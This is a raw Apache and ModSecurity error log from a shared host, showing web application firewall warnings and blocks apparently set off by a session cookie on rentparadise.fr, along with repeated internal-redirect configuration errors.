[Tue May 12 03:57:05.729082 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI8bvMumyrWMfSu7q-HQAAANU"]
[Tue May 12 03:57:05.729275 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI8bvMumyrWMfSu7q-HQAAANU"]
[Tue May 12 03:57:06.309020 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI8bvMumyrWMfSu7q-HQAAANU"]
[Tue May 12 03:57:06.912892 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:40544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:06.912916 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:40544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:07.316154 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/qa"] [unique_id "agKI87OxS7i6i_mT2NLfAgAAAEM"]
[Tue May 12 03:57:07.316375 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/qa"] [unique_id "agKI87OxS7i6i_mT2NLfAgAAAEM"]
[Tue May 12 03:57:07.316585 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI87OxS7i6i_mT2NLfAgAAAEM"]
[Tue May 12 03:57:07.686244 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI87vMumyrWMfSu7q-IAAAANU"]
[Tue May 12 03:57:07.686464 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI87vMumyrWMfSu7q-IAAAANU"]
[Tue May 12 03:57:07.932778 2026] [core:error] [pid 1730207:tid 1730229] [client 74.249.238.26:50303] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:07.932813 2026] [core:error] [pid 1730207:tid 1730229] [client 74.249.238.26:50303] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:08.288760 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI87vMumyrWMfSu7q-IAAAANU"]
[Tue May 12 03:57:10.222318 2026] [core:error] [pid 1691274:tid 1691287] [client 74.249.238.26:39123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:10.222347 2026] [core:error] [pid 1691274:tid 1691287] [client 74.249.238.26:39123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:12.915014 2026] [core:error] [pid 1691274:tid 1691289] [client 74.249.238.26:50278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:12.915036 2026] [core:error] [pid 1691274:tid 1691289] [client 74.249.238.26:50278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:13.731950 2026] [security2:error] [pid 1695975:tid 1695999] [client 43.134.162.36:47110] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-bali/cuisine-bali/"] [unique_id "agKI-dVI9ymHBxup74-gHQAAAJU"]
[Tue May 12 03:57:14.289937 2026] [core:error] [pid 1691274:tid 1691298] [client 74.249.238.26:60358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:14.289967 2026] [core:error] [pid 1691274:tid 1691298] [client 74.249.238.26:60358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:16.177259 2026] [security2:error] [pid 1730207:tid 1730223] [client 43.134.162.36:50164] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2025/06/cuisine-bali-scaled.jpeg"] [unique_id "agKI_Due9Sp-pIv_Bb6kcwAAAU4"], referer: https://rentparadise.fr/accommodation/lodge-bali/cuisine-bali/
[Tue May 12 03:57:16.187829 2026] [core:error] [pid 1730207:tid 1730210] [client 74.249.238.26:50298] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:16.187852 2026] [core:error] [pid 1730207:tid 1730210] [client 74.249.238.26:50298] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:17.860778 2026] [core:error] [pid 1709071:tid 1709097] [client 74.249.238.26:60410] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:17.860801 2026] [core:error] [pid 1709071:tid 1709097] [client 74.249.238.26:60410] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:18.443998 2026] [core:error] [pid 1691274:tid 1691297] [client 74.249.238.26:39143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:18.444034 2026] [core:error] [pid 1691274:tid 1691297] [client 74.249.238.26:39143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:20.587504 2026] [core:error] [pid 1707624:tid 1707699] [client 74.249.238.26:60356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:20.587536 2026] [core:error] [pid 1707624:tid 1707699] [client 74.249.238.26:60356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:21.546799 2026] [core:error] [pid 1730207:tid 1730222] [client 74.249.238.26:50288] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:21.546827 2026] [core:error] [pid 1730207:tid 1730222] [client 74.249.238.26:50288] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:22.876981 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:50264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:22.877007 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:50264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:26.713825 2026] [core:error] [pid 1695975:tid 1695983] [client 74.249.238.26:60378] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:26.713861 2026] [core:error] [pid 1695975:tid 1695983] [client 74.249.238.26:60378] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:27.979643 2026] [core:error] [pid 1709071:tid 1709110] [client 74.249.238.26:60389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:27.979670 2026] [core:error] [pid 1709071:tid 1709110] [client 74.249.238.26:60389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:29.775219 2026] [core:error] [pid 1709071:tid 1709104] [client 74.249.238.26:50249] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:29.775244 2026] [core:error] [pid 1709071:tid 1709104] [client 74.249.238.26:50249] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:32.223973 2026] [core:error] [pid 1707624:tid 1707684] [client 74.249.238.26:50256] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:32.224001 2026] [core:error] [pid 1707624:tid 1707684] [client 74.249.238.26:50256] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:35.884595 2026] [core:error] [pid 1730175:tid 1730190] [client 74.249.238.26:39112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:35.884642 2026] [core:error] [pid 1730175:tid 1730190] [client 74.249.238.26:39112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:38.596210 2026] [core:error] [pid 1730207:tid 1730209] [client 74.249.238.26:60360] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:38.596235 2026] [core:error] [pid 1730207:tid 1730209] [client 74.249.238.26:60360] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:39.367667 2026] [core:error] [pid 1730175:tid 1730181] [client 74.249.238.26:60382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:39.367692 2026] [core:error] [pid 1730175:tid 1730181] [client 74.249.238.26:60382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:40.317439 2026] [core:error] [pid 1695975:tid 1695981] [client 74.249.238.26:60363] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:40.317475 2026] [core:error] [pid 1695975:tid 1695981] [client 74.249.238.26:60363] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:40.697952 2026] [core:error] [pid 1691274:tid 1691292] [client 74.249.238.26:50297] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:40.697988 2026] [core:error] [pid 1691274:tid 1691292] [client 74.249.238.26:50297] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:41.304930 2026] [core:error] [pid 1730207:tid 1730233] [client 74.249.238.26:40572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:41.304965 2026] [core:error] [pid 1730207:tid 1730233] [client 74.249.238.26:40572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:45.076081 2026] [core:error] [pid 1709071:tid 1709111] [client 74.249.238.26:40529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:45.076117 2026] [core:error] [pid 1709071:tid 1709111] [client 74.249.238.26:40529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:46.466185 2026] [core:error] [pid 1707624:tid 1707695] [client 74.249.238.26:50290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:46.466208 2026] [core:error] [pid 1707624:tid 1707695] [client 74.249.238.26:50290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:47.727171 2026] [core:error] [pid 1730207:tid 1730229] [client 74.249.238.26:50248] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:47.727193 2026] [core:error] [pid 1730207:tid 1730229] [client 74.249.238.26:50248] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:48.334143 2026] [core:error] [pid 1730175:tid 1730177] [client 74.249.238.26:40518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:48.334169 2026] [core:error] [pid 1730175:tid 1730177] [client 74.249.238.26:40518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:50.601994 2026] [core:error] [pid 1691274:tid 1691282] [client 74.249.238.26:60397] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:50.602017 2026] [core:error] [pid 1691274:tid 1691282] [client 74.249.238.26:60397] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:51.681932 2026] [core:error] [pid 1709071:tid 1709103] [client 74.249.238.26:40550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:51.681955 2026] [core:error] [pid 1709071:tid 1709103] [client 74.249.238.26:40550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:52.642505 2026] [core:error] [pid 1691274:tid 1691284] [client 74.249.238.26:6084] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:52.642531 2026] [core:error] [pid 1691274:tid 1691284] [client 74.249.238.26:6084] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:53.709757 2026] [core:error] [pid 1707624:tid 1707705] [client 74.249.238.26:50253] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:53.709790 2026] [core:error] [pid 1707624:tid 1707705] [client 74.249.238.26:50253] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:54.097899 2026] [core:error] [pid 1691274:tid 1691637] [client 74.249.238.26:60371] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:54.097934 2026] [core:error] [pid 1691274:tid 1691637] [client 74.249.238.26:60371] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:56.748714 2026] [core:error] [pid 1695975:tid 1696001] [client 74.249.238.26:40523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:56.748748 2026] [core:error] [pid 1695975:tid 1696001] [client 74.249.238.26:40523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:58:11.039213 2026] [:error] [pid 1707624:tid 1707702] [client 74.7.243.217:46214] File does not exist: /home/ofcrysta/public_html/index2.php, referer: http://of-crystal-lake.net/
[Tue May 12 03:58:24.398832 2026] [security2:error] [pid 1730207:tid 1730212] [client 172.104.186.23:56426] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sandbox"] [unique_id "agKJQDue9Sp-pIv_Bb6kvgAAAUM"]
[Tue May 12 03:58:24.399041 2026] [security2:error] [pid 1730207:tid 1730212] [client 172.104.186.23:56426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sandbox"] [unique_id "agKJQDue9Sp-pIv_Bb6kvgAAAUM"]
[Tue May 12 03:58:24.399244 2026] [security2:error] [pid 1730207:tid 1730212] [client 172.104.186.23:56426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJQDue9Sp-pIv_Bb6kvgAAAUM"]
[Tue May 12 03:58:27.917908 2026] [security2:error] [pid 1730207:tid 1730209] [client 43.156.117.41:36108] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agKJQzue9Sp-pIv_Bb6kwAAAAUA"]
[Tue May 12 03:58:29.869016 2026] [:error] [pid 1707624:tid 1707702] [client 74.7.243.217:46214] File does not exist: /home/ofcrysta/public_html/index2.php, referer: http://of-crystal-lake.net/
